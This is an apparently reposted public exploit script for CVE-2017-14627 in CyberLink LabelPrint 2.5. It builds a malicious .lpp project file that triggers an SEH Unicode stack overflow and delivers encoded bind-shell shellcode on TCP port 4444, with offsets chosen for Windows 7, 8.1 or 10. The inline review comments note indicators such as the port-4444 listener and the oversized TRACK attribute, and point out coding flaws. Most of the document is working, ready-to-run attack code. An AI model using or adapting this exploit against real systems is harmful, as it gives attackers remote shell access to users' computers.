CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)
来源:research[at]spentera.id 作者:f3ci 发布时间:2017-09-26  

#!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
#
# Note: CyberLink LabelPrint is bundled with the Power2Go application and is also included on most HP, Lenovo, and Asus laptops.
# This proof of concept is based on the LabelPrint 2.5 that ships with the Power2Go installation.

def exp():
    """Write the proof-of-concept LabelPrint project file into the working directory.

    Output: ``labelprint_poc_universal.lpp`` -- an XML project whose single
    TRACK element carries a 15000-character ``name`` attribute (padded to that
    length by ``sisa`` below).  Reads the module globals ``align``, ``align2``,
    ``junk1`` and ``junk2``; the target-selection code at the bottom of the
    file assigns them before calling this function, and calling it without
    them raises NameError.  Returns nothing; errors (e.g. IOError from
    open()) propagate to the caller.
    """
    # Hex-escaped ASCII for:
    #   <PROJECT version="1.0.00">\n\t<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
    header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"
    "\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"
    "\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"
    "\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"
    "\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"
    "\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"
    "\x30\x31\x37\x22\x3e")
    filename2 = "labelprint_poc_universal.lpp"
    # Text mode, and closed only on the success path at the end of the
    # function: an exception anywhere below leaks the handle (no with/finally).
    f = open(filename2,'w')
    # SEH-overwrite layout: 790 bytes of filler, then the next-SEH and handler
    # fields as two ASCII bytes each (the title says the buffer is handled as
    # Unicode -- presumably widened to UTF-16 by the parser; confirm).
    junk = "A" * 790
    nseh = "\x61\x42"
    seh = "\x2c\x44"
    nop = "\x42"

    #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
    # Encoded bind-shell payload from the msfvenom line above: a host that opens
    # the file and is successfully exploited starts listening on TCP 4444, which
    # is the network-side indicator to watch for.
    buf = ""
    buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
    buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
    buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
    buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
    buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
    buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
    buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
    buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
    buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
    buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
    buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
    buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
    buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
    buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
    buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"


    #preparing address for decoding
    ven = nop               #nop/inc edx
    ven += "\x54"           #push esp
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x05\x1B\x01"   #add eax 01001B00 universal
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #sub eax 01001000
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += nop              #nop/inc edx
    ven += "\x5c"           #pop esp

    #we need to encode the RET address, since C3 is bad char.
    #preparing ret opcode
    ven += nop              #nop/inc edx
    ven += "\x25\x7e\x7e"   #and eax,7e007e00
    ven += nop              #nop/inc edx
    ven += "\x25\x01\x01"   #and eax,01000100
    ven += nop              #nop/inc edx
    ven += "\x35\x7f\x7f"   #xor eax,7f007f00
    ven += nop              #nop/inc edx
    ven += "\x05\x44\x44"   #add eax,44004400
    ven += nop              #nop/inc edx
    ven += "\x57"           #push edi
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += junk2            #depending OS (module global, set per target at the bottom of the file)

    #custom venetian
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += align            #depending OS (module global, set per target at the bottom of the file)
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #add eax, 01000100 #align eax to our buffer
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += nop              #nop/inc edx

    #call esp 0x7c32537b MFC71U.dll
    ven += "\x5C"           #pop esp
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x05\x53\x7c"   #add eax 7c005300 part of call esp
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += junk1            #depending OS (module global, set per target at the bottom of the file)
    ven += "\x7b\x32"       #part of call esp

    #preparing for shellcode
    ven += nop * 114        #junk
    ven += "\x57"           #push edi
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += align2           #depending OS (module global, set per target at the bottom of the file)
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #sub eax,01000100
    ven += nop              #nop/inc edx
    ven += buf              #shellcode

    # Pad the attribute to exactly 15000 characters.  If the prefix ever grew
    # past 15000 the multiplier would be negative, Python would yield "" and
    # the total length would change silently.
    sisa =  nop * (15000-len(junk+nseh+seh+ven))
    payload = junk+nseh+seh+ven+sisa
    # \t\t<TRACK name="<payload>"/>\n  -- the 15000-character attribute is the
    # one concrete thing a file-format check can flag in an .lpp project.
    bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n"
    # \t</INFORMATION>\n</PROJECT>
    bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"
    "\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")
    # NOTE(review): 'w' is text mode, so on Windows Python 2 writes "\r\n"
    # for each "\n" here.
    f.write(header+ "\n" + bug)

    # Python 2 print statements (the file is Python 2 throughout; see input() below).
    print "[+] File", filename2, "successfully created!"
    print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
    print "[*] Good luck ;)"
    f.close()
 
# ---- Entry: target selection (runs at import/execution; Python 2 syntax) ----
print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
print "[*] <------------------------------------------------->\n"
print "\t1.Windows 7 x86 bindshell on port 4444"
print "\t2.Windows 8.1 x64 bindshell on port 4444"
print "\t3.Windows 10 x64 bindshell on port 4444\n"
# Python 2 input() evaluates the typed text as an expression, which is why the
# comparisons below test against the ints 1/2/3 rather than strings.  Text that
# is not a valid expression raises on this line, outside the try below, so that
# error is not swallowed.  NOTE(review): the assignment also rebinds the builtin
# name `input` for the rest of the module.
input = input("Choose Target OS : ")
try:
    if input == 1:
            # Per-target constants; exp() reads all four as module globals.
            align   = "\x05\x09\x01"    #add eax,01000400
            align2  = "\x05\x0A\x01"    #add eax, 01000900
            junk1   = '\x42' * 68       #junk for win7x86
            junk2   = '\x42' * 893      #junk for win7x86
            exp()
    elif input == 2:
            # Per-target constants; exp() reads all four as module globals.
            align   = "\x05\x09\x01"    #add eax,01000400
            align2  = "\x05\x0A\x01"    #add eax, 01000900
            junk1   = '\x42' * 116      #junk for win8.1x64
            junk2   = '\x42' * 845      #junk for win8.1x64
            exp()
    elif input == 3:
            # Per-target constants; exp() reads all four as module globals.
            align   = "\x05\x05\x01"    #add eax,01000400
            align2  = "\x05\x06\x01"    #add eax, 01000900
            junk1   = '\x42' * 136      #junk for win10x64
            junk2   = '\x42' * 313      #junk for win10x64
            exp()
    else:
            print "Choose the right one :)"
except:
    # Bare except: any failure inside the branches (e.g. IOError from the
    # open() in exp()) is swallowed and only an empty line is printed, so a
    # failed run is recognisable only by the missing
    # "[+] File ... successfully created!" message.
    print ""


 